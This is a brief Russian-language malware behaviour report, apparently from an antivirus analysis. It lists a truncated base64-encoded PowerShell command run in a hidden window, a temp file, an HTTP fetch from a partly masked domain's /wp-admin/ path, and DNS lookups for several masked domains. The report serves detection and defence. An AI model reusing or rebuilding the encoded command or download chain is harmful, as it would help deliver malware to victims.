Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3AEEAdwBBAFEAbwBCAD0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAcAB3ACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAVQA0ACcALAAnAEQAawBBACcAKQApADsAJAB3AEcARABVAFEAQQAgAD0AIAAnADUAMQA5ACcAOwAkAHIAQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1396
- %TEMP%\1410498.cvr
- 'vs###gals.com':80
- http://vs###gals.com/wp-admin/7m_ZT/
- DNS ASK sh###ubanu.com
- DNS ASK ma####suharno.info
- DNS ASK vs###gals.com
- DNS ASK gi####chbds247.com
- DNS ASK ry###vka.com.ua
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3AEEAdwBBAFEAbwBCAD0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAcAB3ACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAVQA0ACcALAAnAEQAawBBACcAKQApADsAJAB3AEcARABVAFEAQQAgAD0AIAAnADUAMQA5ACcAOwAkAHIAQ...' (со скрытым окном)